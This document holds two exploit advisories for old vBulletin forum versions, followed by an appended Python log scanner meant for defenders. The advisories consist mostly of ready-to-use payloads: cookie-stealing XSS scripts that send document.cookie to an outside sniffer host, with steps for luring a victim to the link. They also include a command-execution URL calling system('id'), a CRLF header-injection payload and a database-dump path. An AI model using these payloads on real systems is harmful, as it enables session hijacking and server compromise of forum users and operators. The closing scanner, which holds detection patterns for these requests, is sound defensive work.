# Title: vBulletin Version 3.5.2 - Introduction XSS scripting
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.5.2
===============================================
WWW.sec-war.com
===============================================

3.5.2 - XSS script injection
The vulnerability is in the "title" field of the script calendar.php.
Example:
    TITLE: Test <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;</script>
    BODY: anything
    OTHER OPTIONS: anything
That is all: go to the calendar, create a new event and put the following in its title:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;</script>
Then take the link to the event and show it to the person whose cookie is to be stolen.

3.5.3 - XSS script injection in the "Email Address" field of the "Edit Email & Password" module.
Example:
    www.server.som/forumpath/profile.php?do=editpassword
    pass: your pass
    email: vashe@milo.com"><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;</script>.nomatt
Note about length limitation
****
    forum/profile.php?do=editoptions
    Receive Email from Other Members = yes
****
    www.server.com/forumpath/sendmessage.php?do=mailmember&u=(your id)
In the email field write:
    vashe@milo.com"><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;</script>.nomatt
Once it is saved, it is important to make the email option visible to all. Then send someone the link www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u=(your id) and the cookie arrives at the sniffer address.

3.5.4 - Database dump
The vulnerability is in the script upgrade_301.php in the 'install' directory.
Example:
    server.com/forumpath/install/upgrade_301.php?step=SomeWord

3.5.4 - XSS script injection
The vulnerability is in the url parameter of the script inlinemod.php.
Example:
    www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

===============================================
ROOT_EGY to connect: r0t@hotmail.es
===============================================
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
===============================================
# Title: vBulletin 3.0.0 XSS
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.0.0
===============================================
WWW.sec-war.com
===============================================

3.0.0 - XSS script injection in the script search.php. In practice, the hole is exploited through the browser.
Example:
    www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;</script>

3.0-3.0.4 - Command execution in the script forumdisplay.php through incorrect handling of variables.
For example:
    www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

3.0.3-3.0.9 - XSS script injection in the Status field. Only admins (for example, moderators) can change the status.
Example exploit code:
    <body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>

3.0.9 and 3.5.4 - XSS script injection in the posthash parameter of the script newthread.php.
Here is an example:
    www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0

===============================================
ROOT_EGY to connect: r0t@hotmail.es
===============================================
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
===============================================
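
For defenders reviewing web server logs, the request shapes that the two advisories above deliver in the query string can be flagged with a small scanner. This is an added example, not part of the original advisories or of vBulletin: the rule names, the combined-log-format assumption and the sample lines are constructed here, and the stored cases (calendar title, email and Status fields) travel in POST bodies and are outside what an access log shows.

```python
import re
from urllib.parse import parse_qsl, unquote

MARKUP = re.compile(r"<\s*(script|body)|onload\s*=|document\.cookie", re.I)
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def _markup(params, keys=None):
    return any(MARKUP.search(v) for k, v in params if keys is None or k in keys)

# (rule name, script path suffix, predicate over decoded (key, value) pairs)
RULES = [
    ("crlf-in-url-param", "inlinemod.php",
     lambda p: any(k == "url" and re.search(r"[\r\n]", v) for k, v in p)),
    ("install-script-request", "install/upgrade_301.php", lambda p: True),
    ("globals-override", "forumdisplay.php",
     lambda p: any(k.startswith("GLOBALS") for k, _ in p)),
    ("markup-in-search-query", "search.php", lambda p: _markup(p, {"query"})),
    ("markup-in-newthread", "newthread.php", _markup),
]

def classify(target):
    """Return the rule names matched by one request target (path?query)."""
    path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", unquote(path)).lower()  # '//search.php' -> '/search.php'
    params = parse_qsl(query, keep_blank_values=True)  # percent-decodes keys and values
    return [name for name, suffix, pred in RULES
            if path.endswith("/" + suffix) and pred(params)]

def scan(lines):
    """Return (line number, [rule names]) for each access-log line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        rules = classify(m.group(1)) if m else []
        if rules:
            hits.append((n, rules))
    return hits

# Constructed sample lines in combined log format (not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Mar/2024:10:00:01 +0000] "GET /forum/inlinemod.php?do=clearthread&url=a%0d%0aX-Test:%201 HTTP/1.1" 302 0',
    '203.0.113.7 - - [01/Mar/2024:10:00:02 +0000] "GET /forum/install/upgrade_301.php?step=x HTTP/1.1" 200 9000',
    '203.0.113.8 - - [01/Mar/2024:10:00:03 +0000] "GET /forum//search.php?do=process&showposts=0&query=%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 100',
    '203.0.113.8 - - [01/Mar/2024:10:00:04 +0000] "GET /forum/forumdisplay.php?GLOBALS[]=1&f=2 HTTP/1.1" 200 100',
    '198.51.100.2 - - [01/Mar/2024:10:00:05 +0000] "GET /forum/search.php?do=process&query=calendar+script HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A hit on `install-script-request` means the install directory is still reachable on a live forum; removing it after upgrades closes that path regardless of version.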